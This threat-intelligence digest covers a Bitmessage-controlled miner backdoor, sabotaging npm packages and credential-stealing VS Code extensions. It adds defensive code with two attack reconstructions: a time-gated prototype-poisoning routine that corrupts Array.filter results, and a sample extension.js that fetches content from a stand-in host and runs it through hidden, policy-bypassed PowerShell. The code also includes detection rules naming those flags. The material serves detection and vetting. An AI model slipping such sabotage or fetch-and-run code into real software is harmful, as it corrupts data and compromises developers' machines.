Monero-Linked Backdoor Malware Abuses PyBitmessage for Stealth C2
AhnLab Security Intelligence Center (ASEC) has identified a new malware campaign, active in the wild, that delivers a dual payload: a Monero cryptocurrency miner and a backdoor. Attribution remains unclear; the only clue pointing toward a possible Russian origin is the use of a Russia-based file-sharing platform.

The infection starts by decrypting and unpacking resources hidden in the primary executable, then deploying the miner and the backdoor. The miner hijacks system resources to mine Monero, a cryptocurrency favored for its anonymity. Key files, including config[.]json and idle_maintenance[.]exe, are dropped into a temporary directory for persistent mining. In parallel, the backdoor, implemented via PowerShell, installs the PyBitmessage library and binds to local port 8442, ready to receive attacker commands. Those commands arrive as encrypted Bitmessage messages, which standard network monitoring tools neither decrypt nor recognize as C2 traffic.

The sophistication of this campaign lies in its abuse of the Bitmessage protocol, through the PyBitmessage client, which provides end-to-end encryption and sender anonymity. By building C2 on top of it, the attackers avoid a conventional HTTP/S command-and-control channel and hide their traffic inside a decentralized, privacy-focused peer-to-peer network. The backdoor component, bundled with modified libraries, is packaged with PyInstaller to hinder forensic analysis. This setup lets the attackers run PowerShell scripts directly from memory, leaving few disk-based indicators and complicating signature-based detection. The exact distribution vector is not confirmed, but the malware is suspected of spreading through cracked or bundled software posing as legitimate applications.
The risk is substantial; infected systems are exposed to full remote control, persistent crypto mining, and a communication method that blends into legitimate P2P traffic, making containment and response significantly more difficult.
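The indicators above (a loopback listener on 8442, dropped files in a temporary directory, Bitmessage peer traffic) are worth correlating rather than alerting on one at a time. The following is an added example, not code from the ASEC report or the malware itself: a small hunting routine run over constructed host telemetry. The API port 8442 and the two dropped file names come from the report; the sample netstat rows, PIDs, process names, paths and the 8444 peer port (Bitmessage's default P2P port) are assumptions made for the example.

```javascript
// Added example, not code from the ASEC report: correlating host telemetry
// for the PyBitmessage backdoor. The loopback API port 8442 and the dropped
// file names come from the report; the sample lines, PIDs, paths and the
// 8444 peer port (Bitmessage's default P2P port) are assumptions.

const BITMESSAGE_API_PORT = 8442;                              // from the report
const BITMESSAGE_PEER_PORT = 8444;                             // assumed: Bitmessage default P2P port
const DROPPED_FILES = ['config.json', 'idle_maintenance.exe']; // from the report

// Constructed sample in "netstat -ano" layout.
const NETSTAT_SAMPLE = [
  '  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4',
  '  TCP    127.0.0.1:8442         0.0.0.0:0              LISTENING       4120',
  '  TCP    192.168.1.20:51022     203.0.113.9:8444       ESTABLISHED     4120',
  '  TCP    192.168.1.20:51030     203.0.113.44:443       ESTABLISHED     2208',
  '  UDP    0.0.0.0:5353           *:*                                    1532',
];

// Constructed process inventory keyed by PID.
const PROCESS_SAMPLE = {
  4:    { image: 'System' },
  2208: { image: 'msedge.exe' },
  4120: { image: 'powershell.exe' },
};

// Constructed file listing from a %TEMP% sweep (plus one decoy outside it).
const FILE_SAMPLE = [
  'C:\\Users\\alice\\AppData\\Local\\Temp\\idle_maintenance.exe',
  'C:\\Users\\alice\\AppData\\Local\\Temp\\config.json',
  'C:\\Users\\alice\\AppData\\Local\\Temp\\wct1A2B.tmp',
  'C:\\Users\\alice\\Projects\\app\\config.json', // same name, not in %TEMP%, not flagged
];

// Split "addr:port" at the last colon so IPv6 forms such as [::]:8442 survive.
function splitEndpoint(endpoint) {
  const i = endpoint.lastIndexOf(':');
  return { addr: endpoint.slice(0, i), port: Number(endpoint.slice(i + 1)) };
}

// Parse the TCP rows of `netstat -ano`; UDP rows have no state column and are skipped.
function parseNetstat(lines) {
  const sockets = [];
  for (const line of lines) {
    const f = line.trim().split(/\s+/);
    if (f[0] !== 'TCP' || f.length < 5) continue;
    const local = splitEndpoint(f[1]);
    const remote = splitEndpoint(f[2]);
    sockets.push({ laddr: local.addr, lport: local.port, raddr: remote.addr,
                   rport: remote.port, state: f[3], pid: Number(f[4]) });
  }
  return sockets;
}

const isLoopback = (addr) => addr === '127.0.0.1' || addr === '[::1]';
const inTempDir = (p) => /\\AppData\\Local\\Temp\\/i.test(p);
const baseName = (p) => p.slice(p.lastIndexOf('\\') + 1).toLowerCase();

// One finding per matching socket or file; PID is null for file findings.
function huntBitmessageBackdoor(netstatLines, processes, files) {
  const findings = [];
  for (const s of parseNetstat(netstatLines)) {
    const image = (processes[s.pid] || { image: '?' }).image;
    if (s.state === 'LISTENING' && isLoopback(s.laddr) && s.lport === BITMESSAGE_API_PORT) {
      findings.push({ pid: s.pid, image, reason: `loopback listener on ${s.lport} (Bitmessage API port)` });
    }
    if (s.state === 'ESTABLISHED' && s.rport === BITMESSAGE_PEER_PORT) {
      findings.push({ pid: s.pid, image, reason: `outbound peer connection to ${s.raddr}:${s.rport}` });
    }
  }
  for (const path of files) {
    if (inTempDir(path) && DROPPED_FILES.includes(baseName(path))) {
      findings.push({ pid: null, image: null, path, reason: 'known dropped file name under %TEMP%' });
    }
  }
  return findings;
}

// A PID that owns both the API listener and a peer connection is the strongest
// lead: a local-only listener explains why network sensors see nothing unusual.
function pidsWithApiAndPeer(findings) {
  const byPid = new Map();
  for (const f of findings) {
    if (f.pid === null) continue;
    const kinds = byPid.get(f.pid) || new Set();
    kinds.add(f.reason.startsWith('loopback') ? 'api' : 'peer');
    byPid.set(f.pid, kinds);
  }
  return [...byPid].filter(([, kinds]) => kinds.size === 2).map(([pid]) => pid);
}
```

On the constructed sample this returns four findings (two sockets owned by PID 4120, two dropped files) and names PID 4120 as the process with both indicators. Against real hosts, feed it the output of `netstat -ano`, a process listing and a recursive directory listing of the user's temp folder.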
Update: Malicious npm Packages Target JavaScript Ecosystem with Silent Corruption and Destructive Payloads
Socket Security researchers have identified a coordinated supply chain attack targeting JavaScript developers through weaponized npm packages, primarily affecting React, Vue[.]js, and Node[.]js projects. The campaign, attributed to an npm user operating under the alias "xuxingfeng" with a known Chinese email domain, has already resulted in over 6,200 downloads across eight malicious packages that were still active on the npm registry as of May 22, 2025. The attacker publishes a mix of legitimate and malicious packages under the same account to build trust, making it harder for developers to distinguish safe from harmful code. Techniques include typosquatting and mimicry of well-known plugins, such as "vite-plugin-react-extend" and "quill-image-downloader," to exploit developer habits and slip malware into projects.

Once installed, these packages carry payloads that range from deleting files and crashing systems to silently corrupting data, deliberately designed to disrupt development pipelines and production applications. One of the most sophisticated components, a package named "js-hood," targets the foundation of the language by overriding core methods such as Array[.]prototype[.]filter, map, slice, and String[.]prototype[.]trim with corrupted logic. The overrides keep valid signatures and return types, so applications keep running with no immediate sign of failure while the replaced methods inject wrong results at random intervals. This "silent corruption" model is hazardous because it produces inconsistent errors that are nearly impossible to trace during normal debugging, undermining developer trust in the platform and potentially introducing long-term stability issues. The damage is not always immediate: the payload activates based on a timestamp, which further complicates detection.
Developers are advised to conduct immediate audits of all npm dependencies, revert to verified clean states, rotate credentials, and implement automated scanning tools capable of detecting supply chain threats. This campaign highlights a growing trend in open-source ecosystem exploitation, where trust is weaponized and subtle sabotage is used to compromise integrity from within.
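The "js-hood" technique and the corresponding audit check are easiest to understand side by side. The block below is an added example, not code from the malicious package or from Socket's tooling: a time-gated, probabilistic override of Array.prototype.filter in the style the report describes, followed by a tamper check that compares the live built-ins against a snapshot and a lockdown that makes the override fail. The parameter names (activateAt, dropRate, the injected now and rng functions) are this example's own.

```javascript
// Added example, not js-hood's code: a reconstruction of time-gated prototype
// poisoning next to a detection and a lockdown. Names such as activateAt,
// dropRate, now and rng are this example's own.

// Snapshot of the genuine built-ins, taken before any dependency code runs.
// A real application would do this in the very first module it loads.
const NATIVE_SNAPSHOT = {
  'Array.prototype.filter': Array.prototype.filter,
  'Array.prototype.map':    Array.prototype.map,
  'Array.prototype.slice':  Array.prototype.slice,
  'String.prototype.trim':  String.prototype.trim,
};

// "Array.prototype.filter" -> globalThis.Array.prototype.filter
function lookup(path) {
  return path.split('.').reduce((obj, key) => obj[key], globalThis);
}

// --- Attacker side: behaves correctly until activateAt, then occasionally
// drops one surviving element. Signature and return type are unchanged, so
// callers see no exception, only data that is sometimes wrong.
function installPoisonedFilter({ now = Date.now, rng = Math.random, activateAt, dropRate = 0.1 } = {}) {
  const genuine = Array.prototype.filter;
  Object.defineProperty(Array.prototype, 'filter', {
    value: function filter(callback, thisArg) {
      const result = genuine.call(this, callback, thisArg);
      if (now() >= activateAt && result.length > 0 && rng() < dropRate) {
        result.splice(Math.floor(rng() * result.length), 1);
      }
      return result;
    },
    writable: true, configurable: true, enumerable: false,
  });
}

// --- Defender side: compare live built-ins against the snapshot. The identity
// check is the strong one; the [native code] check is a fallback that a more
// thorough attacker could defeat by also replacing Function.prototype.toString.
function detectPrototypeTampering(snapshot = NATIVE_SNAPSHOT) {
  const findings = [];
  for (const [path, genuine] of Object.entries(snapshot)) {
    const current = lookup(path);
    const reasons = [];
    if (current !== genuine) reasons.push('identity differs from startup snapshot');
    if (!/\[native code\]/.test(Function.prototype.toString.call(current))) reasons.push('source is not native code');
    if (reasons.length > 0) findings.push({ path, reasons });
  }
  return findings;
}

// Put the genuine functions back (useful in tests and incident triage).
function restoreBuiltins(snapshot = NATIVE_SNAPSHOT) {
  for (const [path, genuine] of Object.entries(snapshot)) {
    const parts = path.split('.');
    const key = parts.pop();
    Object.defineProperty(lookup(parts.join('.')), key,
      { value: genuine, writable: true, configurable: true, enumerable: false });
  }
}

// Freezing the prototypes makes any later defineProperty/assignment fail
// (TypeError under defineProperty or strict mode). Do this before loading
// dependencies; it will also break polyfills that patch these prototypes.
function lockDownBuiltins() {
  Object.freeze(Array.prototype);
  Object.freeze(String.prototype);
}
```

Before the activation timestamp the poisoned filter is indistinguishable from the real one by behaviour, which is exactly why the check compares function identity rather than outputs. Take the snapshot in the first module you load, before any package code runs, or it will faithfully snapshot the attacker's replacements.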
Malicious VS Code Extensions Target Solidity Developers for Credential Theft on Windows
A newly discovered attack campaign exploits Visual Studio Code's extension system to target Solidity developers on Windows, aiming to steal cryptocurrency wallet credentials and other sensitive data. Discovered by Datadog Security Labs, the campaign used three malicious extensions, solaibot, among-eth, and blankebesxstnion, which posed as developer tools offering Solidity syntax analysis and vulnerability scanning. While these extensions appeared legitimate and functioned as advertised, they concealed embedded malware designed to compromise the host system. Although downloaded only around 50 times before removal from the Marketplace, the extensions likely compromised several environments belonging to developers who often hold privileged access to blockchain infrastructure and digital wallets. The campaign has been attributed to a previously identified threat group tracked as MUT-9332, earlier linked to a separate operation that hid a Monero crypto-miner in VS Code extensions reaching up to a million downloads.

The infection mechanism is a multi-stage chain built for stealth, persistence, and redundancy. The initial malicious code, hidden in the extension[.]js file, calls out to a command-and-control server (solidity[.]bot) and fetches a disguised PowerShell payload. That payload installs a malicious browser extension and modifies Chromium-based browser shortcuts so the extension loads at startup. From there, the malware branches into several pathways to ensure execution, including dropping myau[.]exe, which disables Windows Defender, establishes persistence via registry keys, and includes an anti-forensics mechanism that crashes the system if tampered with. In an unusual twist, the attackers deliver payloads through images, embedding Base64-encoded malware inside files such as new_image[.]jpg hosted on the Internet Archive.
These payloads aim to steal browser credentials, crypto wallet keys, and Discord tokens, exfiltrating them to attacker-controlled infrastructure at m-vn[.]ws/bird.php. The incident underscores the risks of trusted developer ecosystems and highlights the need for continuous vetting and stricter controls on extension permissions and behavior.
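Vetting an extension before installing it comes down to reading its manifest and its entry point for behaviour a syntax analyzer has no business having. The block below is an added example, not Datadog's tooling or the extensions' code: a static triage pass over a constructed extension.js and package.json that scores the patterns the report describes (a child_process call into PowerShell with hidden-window and policy-bypass flags, Base64 decoding of fetched content, outbound HTTP, and activation on every editor start). The sample source, the example.invalid host, the rule weights and the verdict thresholds are all this example's own choices, not indicators from the report.

```javascript
// Added example, not Datadog's tooling or the malicious extensions' code:
// static triage of a VS Code extension's entry point and manifest. The
// sample source, hostnames, weights and thresholds are this example's own.

// Constructed extension.js in the shape the report describes.
const SAMPLE_EXTENSION_JS = `
const vscode = require('vscode');
const { spawn } = require('child_process');
const https = require('https');
function activate(context) {
  https.get('https://example.invalid/update', res => {
    let body = '';
    res.on('data', c => body += c);
    res.on('end', () => {
      const cmd = Buffer.from(body, 'base64').toString();
      spawn('powershell.exe', ['-WindowStyle', 'Hidden', '-ExecutionPolicy', 'Bypass', '-Command', cmd]);
    });
  });
}
module.exports = { activate };
`;
const SAMPLE_MANIFEST = { name: 'solidity-helper-demo', activationEvents: ['*'] };

// Constructed benign extension for comparison: a hover provider and nothing else.
const BENIGN_EXTENSION_JS = `
const vscode = require('vscode');
function activate(context) {
  context.subscriptions.push(
    vscode.languages.registerHoverProvider('solidity', { provideHover() { return null; } }));
}
module.exports = { activate };
`;
const BENIGN_MANIFEST = { name: 'solidity-hover-demo', activationEvents: ['onLanguage:solidity'] };

// Each rule is a regex over the source plus a weight. Weights are a judgement
// call for this example, not a published scoring scheme. Flags may be split
// across array literals, so separators allow quotes, commas and whitespace.
const RULES = [
  { id: 'child_process',   weight: 2, re: /require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]/ },
  { id: 'powershell',      weight: 3, re: /powershell(\.exe)?/i },
  { id: 'hidden_window',   weight: 2, re: /-WindowStyle['",\s]+Hidden|-w['",\s]+hidden/i },
  { id: 'policy_bypass',   weight: 2, re: /-ExecutionPolicy['",\s]+Bypass|-ep['",\s]+bypass/i },
  { id: 'encoded_command', weight: 3, re: /-EncodedCommand|-enc\b/i },
  { id: 'chromium_load_extension', weight: 3, re: /--load-extension/ },
  { id: 'base64_decode',   weight: 1, re: /Buffer\.from\([^)]*['"]base64['"]\s*\)|\batob\(/ },
  { id: 'outbound_http',   weight: 1, re: /https?:\/\/[\w.-]+/ },
];

// Distinct hostnames referenced in the source, for a reviewer to eyeball.
function extractHosts(source) {
  return [...new Set([...source.matchAll(/https?:\/\/([\w.-]+)/g)].map(m => m[1]))];
}

function triageExtension(source, manifest) {
  const hits = [];
  let score = 0;
  for (const rule of RULES) {
    if (rule.re.test(source)) { hits.push(rule.id); score += rule.weight; }
  }
  const notes = [];
  const events = Array.isArray(manifest.activationEvents) ? manifest.activationEvents : [];
  if (events.includes('*')) { notes.push('activates on every editor start ("*")'); score += 1; }
  const hosts = extractHosts(source);
  // Network access alone is not malicious; network content handed to a shell is.
  if (hits.includes('child_process') && hits.includes('powershell') && hosts.length > 0) {
    notes.push('fetches from the network and hands data to PowerShell');
  }
  const verdict = score >= 6 ? 'block' : score >= 3 ? 'review' : 'ok';
  return { score, hits, hosts, notes, verdict };
}
```

Run it over the unpacked VSIX (the file named by "main" in package.json plus any files it requires) before approving an extension for a wallet-holding workstation. The score is only a prioritization aid: a true positive here is a spawn of PowerShell on fetched data, and any hit on that combination deserves a manual read regardless of the total.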